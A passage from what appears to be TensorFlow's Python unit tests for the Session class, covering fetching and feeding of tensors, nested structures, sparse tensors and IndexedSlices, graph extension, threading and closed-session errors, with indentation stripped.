# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual(42.0, res[0])
self.assertEqual(None, res[1])
self.assertEqual(44.0, res[2])
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[4])
self.assertEqual(63.0, sess.run(v))
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(42.0, res[0])
self.assertEqual(None, res[1])
self.assertEqual(44.0, res[2])
self.assertEqual(42.0, res[3])
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c), ABC(a=a, b=b, c=c),
{'a': a.name, 'c': c, 'b': b}])
self.assertTrue(isinstance(res, list))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c),
{'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, tuple))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(DEFG(d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({'d': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {'a': a.name, 'c': c, 'b': b}})
self.assertTrue(isinstance(res, dict))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testFeedSparePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32,
shape=shape,
name='placeholder1')
self.assertAllEqual(sp.shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
sess.run([])
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
